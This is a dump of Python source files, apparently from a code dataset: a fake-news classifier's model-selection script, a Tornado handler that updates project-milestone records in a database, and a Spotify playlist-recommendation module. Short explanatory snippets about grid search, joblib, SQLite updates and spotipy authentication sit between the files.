NNparams={'activation':['logistic','tanh','relu'],'solver':['lbfgs','sgd'],'learning_rate':['constant','invscaling','adaptive'],'random_state':[None,14128]}\r\n# nn=MLPClassifier()\r\n# clf = GridSearchCV(nn, NNparams)\r\n# #\r\n# # NBparams={}\r\n# # nb=GaussianNB()\r\n# # clf = GridSearchCV(nb, NBparams)\r\n# #\r\n# # KNparams={'n_neighbors':[3,4,5,7],'weights':['uniform','distance'],'leaf_size':[30,10,50]}\r\n# # kn=KNeighborsClassifier()\r\n# # clf = GridSearchCV(kn, KNparams)\r\n# #\r\n# # RFparams={'n_estimators':[10,100],'max_features':['auto','log2',None],'oob_score':[False,True],'random_state':[None,14128]}\r\n# # rf=RandomForestClassifier()\r\n# # clf = GridSearchCV(rf, RFparams)\r\n#\r\n clf.fit(X_train, y_train)\r\n print(fold,' ssh ',p)\r\n#\r\n predicted = [LABELS[int(a)] for a in clf.predict(X_test)]\r\n actual = [LABELS[int(a)] for a in y_test]\r\n #\r\n fold_score, _ = score_submission(actual, predicted)\r\n max_fold_score, _ = score_submission(actual, actual)\r\n #\r\n score = fold_score/max_fold_score\r\n #print(\"SCORE::\",score)\r\n print(\"Score for fold \"+ str(fold) + \" was - \" + str(score))\r\n if score > best_score:\r\n best_score = score\r\n best_fold = clf\r\n joblib.dump(clf, 'fold'+str(p)+'.pkl')\r\n\r\n #Run on Holdout set and report the final score on the holdout set\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_holdout)]\r\n actual = [LABELS[int(a)] for a in y_holdout]\r\n print(\"Dev\",score_defaults(actual))\r\n print(\"Scores on the dev set\")\r\n report_score(actual,predicted)\r\n print(\"\")\r\n 
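The commented-out blocks above sketch hyper-parameter grids for several classifiers. A self-contained version of the grid search this script gestures at, using the same GradientBoostingClassifier and a small grid; the random demo matrices are illustrative stand-ins for the FNC feature data:

import numpy as np
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import GridSearchCV

rng = np.random.RandomState(14128)
X_demo = rng.rand(200, 44)       # stand-in for the engineered feature matrix
y_demo = rng.randint(0, 4, 200)  # four stance labels

params = {'n_estimators': [100, 200], 'min_samples_split': [2, 3]}
search = GridSearchCV(GradientBoostingClassifier(random_state=14128), params, cv=3)
search.fit(X_demo, y_demo)
print(search.best_params_, search.best_score_)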
print(\"\")\r\n\r\n #Run on competition dataset\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_competition)]\r\n actual = [LABELS[int(a)] for a in y_competition]\r\n print(\"Comp\",score_defaults(actual))\r\n\r\n print(\"Scores on the test set\")\r\n report_score(actual,predicted)\r\nprint(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\")\r\n#\r\nfor i in range(1,26):\r\n try:\r\n best_fold = joblib.load('fold'+str(i)+'.pkl')\r\n\r\n #Run on Holdout set and report the final score on the holdout set\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_holdout)]\r\n actual = [LABELS[int(a)] for a in y_holdout]\r\n print(\"Dev\",i,score_defaults(actual))\r\n print(\"Scores on the dev set\")\r\n report_score(actual,predicted)\r\n print(\"\")\r\n print(\"\")\r\n\r\n #Run on competition dataset\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_competition)]\r\n actual = [LABELS[int(a)] for a in y_competition]\r\n print(\"Comp\",i,score_defaults(actual))\r\n\r\n print(\"Scores on the test set\")\r\n report_score(actual,predicted)\r\n#\r\n#\r\n# Xs[len(folds)]=X_holdout\r\n# ys[len(folds)]=y_holdout\r\n# ids = list(range(len(folds)+1))\r\n# X_train = np.vstack(tuple([Xs[i] for i in ids]))\r\n# y_train = np.hstack(tuple([ys[i] for i in ids]))\r\n#\r\n# best_fold.fit(X_train,y_train)\r\n# #Run on competition dataset\r\n# predicted = [LABELS[int(a)] for a in best_fold.predict(X_competition)]\r\n# actual = [LABELS[int(a)] for a in y_competition]\r\n#\r\n# print(\"Scores on the test set (full train)\")\r\n# report_score(actual,predicted)\r\n#\r\n except:\r\n pass\r\n","repo_name":"Kibanos/FakeNewsProject","sub_path":"MLSelection.py","file_name":"MLSelection.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33465139341","text":"# -*- coding: utf-8 -*-\nfrom Pagination import Pagination\nimport tornado\nfrom handlers.base import BaseHandler\nimport uuid, os, datetime\nfrom tornado.options import define, options\nimport msg\nimport json\nimport events\n\nclass MilePostHandler(BaseHandler):\n def get(self):\n id = self.get_argument(\"id\")\n guid = self.get_argument(\"guid\")\n\n tag = self.get_argument(\"tag\",\"milepost_project\")\n if tag ==\"milepost_project\":\n btypeid= self.get_argument(\"btypeid\")\n\n project_cq = self.db.query(\"select * from t_projects_member where project_id=%s and team_id=38\",id)\n project_btypes = self.db.query(\n \"select * from t_projects_type where income_category='业务分类'\",\n )\n project_milepost = self.db.query(\"select * from t_projects_milepost where project_id=%s\",id)\n t_project = self.db.get('select * from t_projects where id=%s',id)\n project_milepost_item = self.db.get(\n 'select * from t_projects_type where id=%s', btypeid)\n project_milepost_type = self.db.query(\n \"select *,b.order_int border_int from t_projects_type a inner join t_projects_milepost b on b.type_id=a.id where income_category='办结' and project_id=%s order by b.order_int\",id\n )\n\n\n\n return self.render(\n \"milepost/milepost_project.html\",\n project_milepost_type=project_milepost_type,\n project_milepost_item=project_milepost_item,\n search_key=\"\",\n t_project=t_project,\n project_milepost=project_milepost,\n project_btypes=project_btypes,\n project_cq=project_cq)\n\n\n\n def post(self):\n tag = self.get_argument(\"tag\")\n uid = self.get_secure_cookie(\"uid\")\n uid_name = self.get_secure_cookie(\"name\")\n 
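The model-selection loop above persists every candidate classifier with joblib (one 'foldN.pkl' per run) and reloads them later by index. A compact round-trip of that save/load pattern, using the top-level joblib package rather than the deprecated sklearn.externals path; the tiny model and file name are illustrative stand-ins:

import joblib
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.RandomState(0)
model = LogisticRegression().fit(rng.rand(50, 4), rng.randint(0, 2, 50))
joblib.dump(model, 'fold1.pkl')        # one pickle per candidate fold

best_fold = joblib.load('fold1.pkl')   # reload later for scoring
print(best_fold.predict(rng.rand(3, 4)))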
dt=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n # print \"mile\", tag\n if tag == \"confirm\":\n mid = self.get_argument(\"mid\",0)\n mp_id = self.get_argument(\"mp_id\")\n guid = self.get_argument(\"guid\")\n project_id = self.get_argument(\"project_id\")\n update_id = self.get_argument(\"update_id\",0)\n is_close = self.get_argument(\"is_close\")\n btype_id_name=self.get_argument('btype_id_name','')\n milepost = self.db.get(\"select * from t_projects_milepost where id=%s\",mp_id)\n customer_id=self.get_argument('customer_id','0')\n bresult = 1\n # print \"milepost===============\",\n if not milepost:\n self.write(\"not milepost\")\n else:\n t_project=self.db.get('''\n select * from t_projects where customer_company!='' and company_uid!='' and comany_person!='' and true_reg_addr!=''\n and company_created_day is not null and (company_expired_day is not null or company_fever!=0) and city!='' and zone!='' and id=%s\n ''',project_id)\n\n\n if milepost.type_name==u'填写办结信息':\n t_projects_transfile = self.db.get('''\n select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=1\n ''', project_id, milepost.member_id)\n if not t_projects_transfile:\n return self.write(\"wrong_tran\")\n elif not t_project and btype_id_name!=\"公司注销\":\n # print \"l.......1\"\n return self.write(\"-100\") #需要补资料\n elif milepost.type_name==u'仓管通知销售交接':\n t_projects_transfile = self.db.get('''\n select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=1 and cq_uid =0\n ''', project_id, milepost.member_id)\n # t_projects_transfile_sales = self.db.get('''\n # select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=2\n # ''', project_id, milepost.member_id)\n if t_projects_transfile:\n return self.write(\"not_confirm_cg\") #仓管没有确认\n\n # elif not t_projects_transfile_sales:\n # return self.write(\"wrong_tran_sales\")\n elif not t_project and btype_id_name!=\"公司注销\":\n # print \"l.......2\", btype_id_name\n return self.write(\"-100\") #需要补资料\n\n\n else:\n if is_close == \"1\":\n t_projects_type = self.db.get(\n \"select * from t_projects_type where income_name='仓管确认交接完成'\"\n )\n if not t_projects_type:\n return self.write(\"not t_projects_type\")\n\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set confirm_at=%s,uid=%s,uid_name=%s where id=%s \n \"\"\", dt, uid, uid_name, mp_id)\n\n if bresult == 0:\n bresult = self.db.execute(\n \"\"\"\n update t_projects_milepost set is_close=1\n where member_id=%s and project_id=%s \n \"\"\", milepost.member_id,\n project_id)\n\n bresult = self.db.execute(\n \"\"\"\n update t_projects_milepost set confirm_at=%s,uid=%s,uid_name=%s\n where member_id=%s and project_id=%s and order_int=8\n \"\"\", dt, uid, uid_name, milepost.member_id,project_id)\n\n bresult = self.db.execute(\n \"\"\" update t_projects_member set\n last_milepost_id=%s ,\n last_milepost_id_name=%s , \n last_milepost_id_at=%s ,\n is_close=1\n where mid=%s and project_id=%s \n \"\"\", t_projects_type.id,\n t_projects_type.income_name,\n dt,\n milepost.member_id,\n project_id)\n \n \n return self.write(str(bresult))\n elif milepost.type_name == u'仓管确认交接完成':\n if mid :\n self.db.execute(\"\"\"\n update t_projects_transition set rec_by_uid_at=%s where project_id=%s and mid=%s and is_customer=1\n \"\"\",dt,project_id,mid)\n \n # elif milepost.type_name==u\"销售顾问接受交接\":\n # t_projects_transfile = self.db.get('''\n # select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=2 and cq_uid != 0\n # ''', project_id, mid) # 检查\n 
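The handler above issues torndb-style self.db.execute(...) updates with %s placeholders and a freshly formatted timestamp. A standalone sketch of that confirm-update against an in-memory SQLite table; the schema is trimmed to the touched columns, and ? placeholders replace %s for the sqlite3 driver:

import sqlite3
import datetime

conn = sqlite3.connect(':memory:')
conn.execute("CREATE TABLE t_projects_milepost (id INTEGER, confirm_at TEXT, uid INTEGER, uid_name TEXT)")
conn.execute("INSERT INTO t_projects_milepost VALUES (1, NULL, NULL, NULL)")

dt = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# Parameterized update, mirroring the handler's milestone-confirm step:
conn.execute("UPDATE t_projects_milepost SET confirm_at=?, uid=?, uid_name=? WHERE id=?",
             (dt, 42, 'demo-user', 1))
conn.commit()
print(conn.execute("SELECT * FROM t_projects_milepost").fetchone())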
# if not t_projects_transfile:\n # return self.write(\"not_confirm_sales\")\n\n t_project1=self.db.get('''\n select aa.* from (\n select \n ifnull(((all_income+ifnull(other_money,0)) -( ifnull(b.income_money,0)+ifnull(daishou_money,0))),0) qk\n from t_projects a \n left join (select b1.project_id,ifnull(sum(income_money),0) income_money from t_projects_income b1 ,t_projects_income_title b2 where\n b1.parent_id=b2.id and income_id <=43 and income_uid > 0 group by b1.project_id) b \n on a.id=b.project_id \n left join (select project_id,ifnull(sum(income_money),0) other_money from t_projects_income_other group by project_id) c \n on a.id=c.project_id \n left join (select e1.project_id,ifnull(sum(income_money),0) daishou_money from t_projects_income e1,t_projects_income_title e2 where \n e1.parent_id=e2.id and \n income_id >43 and income_uid > 0 group by e1.project_id) e \n on a.id=e.project_id where a.id=%s\n group by a.id) aa where qk <> 0\n \n ''',project_id)\n\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set confirm_at=%s,uid=%s,uid_name=%s where id=%s \n \"\"\", dt, uid, uid_name, mp_id)\n \n if t_project1 and milepost.type_name=='办结':\n if t_project1.qk!=0:\n self.db.execute('''\n update t_projects set is_finance_project=1 where id=%s\n ''',project_id)\n\n\n self.db.execute(\n \"\"\"update t_projects_member set last_milepost_id=%s ,\n last_milepost_id_name=%s , last_milepost_id_at=%s where mid=%s \"\"\",\n milepost.type_id, milepost.type_name, dt,\n milepost.member_id)\n \n t_projects_member = self.db.get(\n \" select * from t_projects_member where mid=%s and project_id=%s\",\n milepost.member_id, project_id)\n if t_projects_member:\n if milepost.type_name != u'待接单' or milepost.type_name != u'办理中' and t_projects_member.btype_id_name==u\"公司注册\" :\n self.db.execute(\n \"update t_projects set reg_state=2 where id=%s\",\n project_id)\n events.add_project_event(self, project_id,'订单流转('+milepost.btype_name+')',milepost.type_name,\n uid, uid_name,customer_id)\n\n return self.write(str(bresult))\n elif tag == \"group_confirm\": #批量接单\n mid = self.get_argument(\"mid\")\n\n result =1\n for item in mid.split(\",\"):\n # print \"item\",item\n milepost = self.db.query(\n \"select * from t_projects_milepost where member_id=%s and confirm_at is null and (order_int=1 or order_int=2) order by order_int \",\n item)\n for row in milepost:\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set \n confirm_at=%s,uid=%s,uid_name=%s \n where id=%s \n \"\"\", dt, uid, uid_name, row.id)\n # print \"bresult\", bresult, \"row.id0\", row.id\n if row.order_int == 2:\n\n self.db.execute(\n \"\"\"update t_projects_member set last_milepost_id=%s ,\n last_milepost_id_name=%s , last_milepost_id_at=%s where mid=%s and project_id=%s\"\"\",\n row.type_id, row.type_name, dt, item,\n row.project_id)\n self.write(str(result))\n elif tag == \"group_confirm_other\":\n mid = self.get_argument(\"mid\")\n type_name = self.get_argument(\"type_name\")\n result = 1\n for item in mid.split(\",\"):\n # print item,type_name,\".....\"\n milepost = self.db.query(\n \"select * from t_projects_milepost where member_id=%s and confirm_at is null and (type_name=%s) order by order_int \",\n item, type_name)\n for row in milepost:\n # print item,type_name,\".....\",row\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set \n confirm_at=%s,uid=%s,uid_name=%s \n where id=%s \n \"\"\", dt, uid, uid_name, row.id)\n if bresult ==0:\n result = self.db.execute(\n \"\"\"update t_projects_member set 
last_milepost_id=%s ,\n last_milepost_id_name=%s , last_milepost_id_at=%s where mid=%s and project_id=%s\"\"\",\n row.type_id, row.type_name, dt, item,row.project_id)\n if result==0:\n self.db.execute(\"update t_projects set category_id=0 ,category_id_name=NULL where id=%s\",row.project_id)\n\n self.write(str(result))\n elif tag == \"reset_category\":\n category_id = self.get_argument(\"category_id\")\n if not category_id:\n self.write(\"not category_id\")\n else:\n result = self.db.execute(\n \"update t_projects set category_id=0 ,category_id_name=NULL where category_id=%s \",\n category_id)\n self.write(str(result))\n\n elif tag ==\"update_remark\":\n mp_id = self.get_argument(\"mp_id\")\n guid = self.get_argument(\"guid\")\n remark = self.get_argument(\"milepost_remark\",\"\")\n dt=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n project_id = self.get_argument(\"project_id\")\n result = self.db.execute(\"\"\"\n update t_projects_milepost set confirm_at=%s,remark=%s where id=%s and project_id=%s\n \"\"\",dt,remark, mp_id,project_id)\n self.write(str(result))\n","repo_name":"huangcun666/h_pyincome","sub_path":"handlers/milepost.py","file_name":"milepost.py","file_ext":"py","file_size_in_byte":14202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38672632462","text":"import os\nimport re\nimport base64\nimport datetime\nimport platform\nfrom numpy.core.arrayprint import format_float_positional\nimport requests\nimport spotipy\nimport time\nimport random\nimport pickle\nimport sqlite3\nfrom sqlite3 import Error\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen\nfrom spotipy.oauth2 import SpotifyOAuth, SpotifyClientCredentials\nfrom scipy.spatial.distance import cdist\nimport seaborn as sns\nfrom dotenv import load_dotenv\n\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\n\ncwd = os.getcwd()\n\n#import sys\n#sys.path.insert(1, cwd)\n#import config\n# Spotify Credentials\n#os.environ[\"SPOTIPY_CLIENT_ID\"] = config.SPOTIPY_CLIENT_ID\n#os.environ[\"SPOTIPY_CLIENT_SECRET\"] = config.SPOTIPY_CLIENT_SECRET\n#os.environ['SPOTIPY_REDIRECT_URI'] = config.SPOTIPY_REDIRECT_URI # Needed for user authorization\n#print(\"STS\", st.secrets[\"SPOTIPY_CLIENT_ID\"])\n# load_dotenv()\n\n\n\n# SPOTIPY_CLIENT_ID = os.getenv('SPOTIPY_CLIENT_ID')\n\n# SPOTIPY_CLIENT_SECRET = os.getenv('SPOTIPY_CLIENT_SECRET')\n\n# SPOTIPY_REDIRECT_URI = os.getenv('SPOTIPY_REDIRECT_URI')\n\n\n\n\n# # Defining scope to read user playlist and write playlist to user\n\n# scope = 'user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read'\n\n# spotify = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))\n\nlog_filename = os.path.join(cwd, 'data', 'read_spotify_mpd_log.txt')\nfeedback_db_file = os.path.join(cwd, 'data', 'user_feedback.db')\n\n# Pickled models\nmodel_path = '../model/KMeans_K17_20000_sample_model.sav'\ntsne_path = '../model/openTSNETransformer.sav'\nscaler_path = '../model/StdScaler.sav'\nplaylists_db_path = '../data/spotify_20K_playlists.db'\ntrain_data_scaled_path = '../data/scaled_data.csv'\nopenTSNE_path = '../data/openTSNE_20000.csv'\n\ndef get_public_ip():\n try:\n data = str(urlopen('http://checkip.dyndns.com/').read())\n # data = 'Current IP CheckCurrent IP Address: 65.96.168.198\\r\\n'\n ip = re.compile(r'Address: (\\d+\\.\\d+\\.\\d+\\.\\d+)').search(data).group(1)\n except:\n ip = ''\n return 
ip\n\ndef get_num_tracks_fig(opt='total', rows=200):\n with open(log_filename) as log_file:\n playlist_files = []\n new_tracks = []\n req_tracks = []\n for line in log_file:\n line = line.strip()\n if 'File: data/mpd.slice' in line:\n playlist_files.append(line.split('.')[-2])\n if 'Created new track_ids' in line:\n new_tracks.append(int(line.split(':')[1].rstrip()))\n if opt == 'total':\n mode = 'overlay'\n if 'Total tracks/ratings in this file' in line:\n req_tracks.append(int(line.split(':')[1].rstrip()))\n else:\n mode = 'stack'\n if 'Tracks already exist' in line:\n req_tracks.append(int(line.split(':')[1].rstrip()))\n\n req_tracks_df = pd.DataFrame(zip(playlist_files, req_tracks), columns=['files', 'num of tracks'])\n req_tracks_df['tracks'] = opt\n new_tracks_df = pd.DataFrame(zip(playlist_files, new_tracks), columns=['files', 'num of tracks'])\n new_tracks_df['tracks'] = 'new'\n tracks_df = pd.concat([req_tracks_df.iloc[:rows], new_tracks_df.iloc[:rows]])\n \n fig = px.bar(tracks_df,\n x='files',\n y='num of tracks',\n color='tracks',\n barmode=mode)\n return fig\n\nclass User_FeedbackDB():\n db_file = None\n conn = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.db_file = feedback_db_file\n self.create_connection()\n self.create_table()\n\n def create_connection(self):\n \"\"\" create a database connection to the SQLite database specified by db_file\n :return: None\n \"\"\"\n try:\n self.conn = sqlite3.connect(self.db_file)\n except Error as e:\n print(e)\n\n def create_table(self):\n \"\"\" create a feedback table\n :return: None\n \"\"\"\n try:\n sql_create_table_feedback = \"\"\" CREATE TABLE IF NOT EXISTS feedback (\n hostname text NOT NULL,\n user_ip text NOT NULL,\n feedback text NOT NULL,\n rec_type text NOT NULL,\n rec_name text NOT NULL,\n ml_model_options text,\n username text\n ); \"\"\"\n cur = self.conn.cursor()\n cur.execute(sql_create_table_feedback)\n except Error as e:\n print(e)\n print('Failed to create feedback table')\n\n def check_feedback_exists(self, feedback):\n \"\"\"\n Query feedback by user_ip, rec_name, ml_model_options, username\n :param feedback_list:\n :return: True/False\n \"\"\"\n cur = self.conn.cursor()\n cur.execute(\"SELECT feedback FROM feedback WHERE user_ip=? and rec_name=? and ml_model_options=? and username=?\", (feedback[1], feedback[4], feedback[5], feedback[6]))\n rows = cur.fetchall()\n feedback_exists = False\n if len(rows) > 0:\n feedback_exists = True\n return feedback_exists\n\n def add_user_feedback(self, feedback):\n \"\"\"\n Add a new feedback\n :param feedback list:\n :return: None\n \"\"\"\n hostname = platform.node()\n user_ip = get_public_ip()\n data_tuple = tuple([hostname, user_ip] + feedback)\n if self.check_feedback_exists(data_tuple):\n return\n sql = ''' INSERT INTO feedback(hostname, user_ip, feedback, rec_type, rec_name, ml_model_options, username)\n VALUES(?,?,?,?,?,?,?) 
'''\n try:\n cur = self.conn.cursor()\n cur.execute(sql, data_tuple)\n self.conn.commit()\n except:\n print('Failed to add feedback')\n\n def get_feedback_plot(self):\n feedback_df = pd.read_sql('select feedback, rec_type from feedback', self.conn)\n fig = None\n if len(feedback_df) > 0:\n feedback_df = feedback_df.value_counts().reset_index().rename(columns={0: 'count'})\n fb_order = {'Love it': 0, 'Like it': 1, 'Okay': 2, 'Hate it': 3}\n feedback_df = feedback_df.sort_values(by='feedback', key=lambda x: x.map(fb_order))\n fig = px.bar(feedback_df,\n y='count',\n x='feedback',\n color='rec_type',\n barmode='group')\n return fig\n\n def get_all_feedbacks_df(self):\n all_feedbacks_df = pd.read_sql('select * from feedback', self.conn)\n return all_feedbacks_df\n\n def add_feedback_df(self, feedback_df):\n feedback_df.to_sql(name='feedback', con=self.conn, if_exists='replace', index=False)\n\nclass SPR_ML_Model():\n def __init__(self):\n \"\"\"\n Inits class with hard coded values for the Spotify instance and gets the paths for all the models and data\n \"\"\"\n # Model loading\n self.model = pickle.load(open(model_path, 'rb'))\n self.tsne_transformer = pickle.load(open(tsne_path, 'rb'))\n self.scaler = pickle.load(open(scaler_path, 'rb'))\n\n # Data loading\n self.playlists_db = playlists_db_path\n conn = sqlite3.connect(playlists_db_path)\n self.tracks_df = pd.read_sql('select * from tracks', conn)\n self.playlists_df = pd.read_sql('select * from playlists', conn)\n self.playlists_df['cluster'] = pd.Categorical(self.model.labels_)\n self.features_df = pd.read_sql('select * from features', conn)\n self.ratings_df = pd.read_sql('select * from ratings', conn)\n if conn:\n conn.close()\n \n self.train_scaled_data = np.loadtxt(train_data_scaled_path, delimiter=',')\n self.train_data_scaled_feats_df = pd.DataFrame(self.train_scaled_data)\n self.train_data_scaled_feats_df['cluster'] = pd.Categorical(self.model.labels_)\n self.openTSNE_df = pd.read_csv(openTSNE_path)\n self.openTSNE_df['cluster'] = pd.Categorical(self.model.labels_)\n \nclass SpotifyRecommendations():\n \"\"\"\n This Class will provide music recommendations in a form of Playlists\n Attributes:\n - model_path (str): Path to where the model is saved, should be pretrained.\n - tsne_path (str): Path to where the TSNE transformer is saved, should be pretrained.\n - scaler_path (str): Path to where the Standar Scaler transformer is saved, should be pretrained.\n - playlists_path (str): Path to where the Playlists file is saved, will represent the pool provide recommendations.\n - scaled_data_path (str): Path to where the Scaled Data is saved, all playlists used for training should be present.\n \n This function will compute the most similar or disimilar playlists given a target vector 'y' which represents the mean\n features of the user's favorite songs. 
Similarity is calculated based on metrics such as Cosine, Manhattan, Euclidean, etc.\n Parameters:\n - model: Trained clustering model.\n - train_data_scaled_feats_df (dataframe): Dataframe with scaled data for all the training data\n - playlists (dictionary): Dictionary with all the playlists from the .json files\n - y (np.array): user's favorite songs scaled vector\n - n (int): top n playlists to retrieve\n - metric (str): metric to use, recommended 'cityblock', 'euclidean', 'cosine'.\n - similar (bool): whether to calculate most similar or most disimilar \n - printing (bool): whether to print the results or not\n Output:\n - indices (np.array): indices of the top n playlists based on the train_data_scaled_feats_df dataframe\n\n \"\"\"\n def __init__(self, playlist_uri=None, song_name=None, sp_user=None):\n \"\"\"\n Inits class with hard coded values for the Spotify instance and gets the paths for all the models and data\n \"\"\"\n self.feat_cols_user = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness', 'instrumentalness',\n 'liveness', 'valence', 'tempo', 'duration_ms', 'time_signature']\n\n self.playlist_uri = playlist_uri\n self.song_name = song_name\n self.len_of_favs = 'all_time'\n self.log_output = None\n sequential =['Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds','YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', \n 'RdPu', 'BuPu', 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']\n self.color = random.choice(sequential)\n \n load_dotenv()\n\n\n\n SPOTIPY_CLIENT_ID = os.getenv('SPOTIPY_CLIENT_ID')\n\n SPOTIPY_CLIENT_SECRET = os.getenv('SPOTIPY_CLIENT_SECRET')\n\n SPOTIPY_REDIRECT_URI = os.getenv('SPOTIPY_REDIRECT_URI')\n\n\n\n\n# Defining scope to read user playlist and write playlist to user\n\n # scope = 'user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read'\n\n # spotify = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))\n if self.playlist_uri is not None:\n # self.sp = spotipy.Spotify(client_credentials_manager = SpotifyClientCredentials())\n self.sp = spotipy.Spotify(auth_manager = SpotifyOAuth(client_id = SPOTIPY_CLIENT_ID,\n client_secret = SPOTIPY_CLIENT_SECRET,\n redirect_uri = SPOTIPY_REDIRECT_URI))\n else:\n # Hardcoded init variables\n # Defining scope to read user playlist and write playlist to user\n #self.scope = 'user-library-read user-follow-read playlist-modify-private playlist-modify'\n # self.scope = \"user-library-read\"\n self.scope = \"user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read\"\n self.sp_oauth = SpotifyOAuth(scope = self.scope, username=sp_user)\n try: \n token_info = self.sp_oauth.get_cached_token()\n access_token = token_info['access_token']\n self.sp = spotipy.Spotify(access_token)\n #token = spotipy.util.prompt_for_user_token(sp_user, self.scope)\n #self.sp = spotipy.Spotify(auth=token)\n #self.sp_oauth = SpotifyOAuth(scope = self.scope, requests_session=True, requests_timeout=10, username=sp_user)\n #self.sp = spotipy.Spotify(auth_manager=self.sp_oauth)\n except:\n self.sp = None\n #print(self.sp.me())\n\n def init_sp(self, response_url):\n code = self.sp_oauth.parse_response_code(response_url)\n #print(self.sp_oauth.get_access_token(code))\n token_info = self.sp_oauth.get_access_token(code, check_cache=False)\n access_token = token_info['access_token']\n self.sp = spotipy.Spotify(access_token)\n\n def get_html_for_login(self):\n auth_url = self.sp_oauth.get_authorize_url()\n return auth_url\n\n def set_ml_model(self, ml_model):\n # 
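# A minimal sketch of the spotipy authorization used above. Passing the
# SpotifyOAuth object as auth_manager lets spotipy handle token caching and
# refresh itself, rather than indexing into get_cached_token(), which returns
# None when no cached token exists and would raise a TypeError in the
# source's try block. The scope string is copied from the source; the
# SPOTIPY_* environment variables are assumed to be set.
import spotipy
from spotipy.oauth2 import SpotifyOAuth

scope = "user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read"
sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))
print(sp.me()['display_name'])   # triggers the interactive auth flow if needed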
Model loading\n self.model = ml_model.model\n self.tsne_transformer = ml_model.tsne_transformer\n self.scaler = ml_model.scaler\n\n # Data loading\n self.tracks_df = ml_model.tracks_df\n self.playlists_df = ml_model.playlists_df\n self.features_df = ml_model.features_df\n self.ratings_df = ml_model.ratings_df\n self.train_data_scaled_feats_df = ml_model.train_data_scaled_feats_df\n self.openTSNE_df = ml_model.openTSNE_df\n\n def get_audio_features_df(self, track_uris_list=None, playlist_pids_list=None):\n self.log_output('Getting Audio features for the tracks')\n # Get all track_uri for playlists\n if playlist_pids_list is not None:\n self.log_output('Getting audio features for tracks in Top Playlists in the Cluster\\n' + ','.join([str(pid) for pid in playlist_pids_list]))\n ratings_df = self.ratings_df[self.ratings_df['pid'].isin(playlist_pids_list)].copy()\n tracks_df = self.tracks_df[self.tracks_df['track_id'].isin(ratings_df['track_id'].values)].copy()\n track_uris_list = tracks_df['track_uri'].values\n self.log_output('Tracks in this list: ' + str(len(track_uris_list)))\n \n self.log_output('Unique tracks in this list: ' + str(len(set(track_uris_list))))\n # Find audio features if track_uri is already in the database:\n tracks_df = self.tracks_df[self.tracks_df['track_uri'].isin(set(track_uris_list))][['track_id', 'track_uri']].copy()\n exist_audio_feats_df = self.features_df[self.features_df['track_id'].isin(tracks_df['track_id'].values)].copy()\n exist_audio_feats_df = exist_audio_feats_df.merge(tracks_df, on='track_id')\n exist_audio_feats_df.drop(columns='track_id', inplace=True)\n exist_audio_feats_df.rename(columns={'track_uri':'uri'}, inplace=True)\n if len(exist_audio_feats_df) == len(set(track_uris_list)):\n self.log_output('Got all audio features from database for tracks: ' + str(len(exist_audio_feats_df)))\n return exist_audio_feats_df\n \n track_uris_list = list(set(track_uris_list) - set(tracks_df['track_uri'].tolist()))\n\n # Extract audio features from Spotify\n audio_feats = []\n chunks_uris = [track_uris_list[i:i + 100] for i in range(0, len(track_uris_list), 100)]\n for chunk in chunks_uris:\n for _ in range(5):\n try:\n chunk_audio_feats = self.sp.audio_features(chunk)\n audio_feats.append(chunk_audio_feats)\n except Exception as e: \n print(e)\n print('chunk: {}'.format(chunk))\n else:\n break\n else:\n print('Everything failed')\n \n audio_feats_df = pd.DataFrame([item for sublist in audio_feats for item in sublist if item])\n track_uris_list = audio_feats_df['id'].tolist()\n audio_feats_df = audio_feats_df[self.feat_cols_user]\n audio_feats_df['uri'] = track_uris_list\n #audio_feats_df.insert(column='uri', value=track_uris_list)\n self.log_output('Extracted audio features from Spotify: ' + str(len(audio_feats_df)))\n if len(exist_audio_feats_df) > 0:\n self.log_output('Got some audio features from database for tracks: ' + str(len(exist_audio_feats_df)))\n audio_feats_df = pd.concat([exist_audio_feats_df, audio_feats_df])\n return audio_feats_df\n\n def get_tracks_from_playlist_or_user_favorites(self):\n if self.playlist_uri:\n self.log_output('---\\nGetting all tracks for Playlist')\n # Get all tracks in the playlist\n results = self.sp.playlist(self.playlist_uri)['tracks']\n tracks = results['items']\n while results['next']:\n results = self.sp.next(results)\n tracks.extend(results['items'])\n else:\n self.log_output('Getting all tracks for User Favorites')\n \"Get all favorite tracks from current user and return them in a dataframe\"\n results = 
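# The chunked fetch in get_audio_features_df above leans on two less-common
# constructs: try/except/else (the else runs only when no exception was
# raised) and for/else (the else runs only when the loop finished without
# break). A standalone sketch with a stubbed, sometimes-failing fetch in
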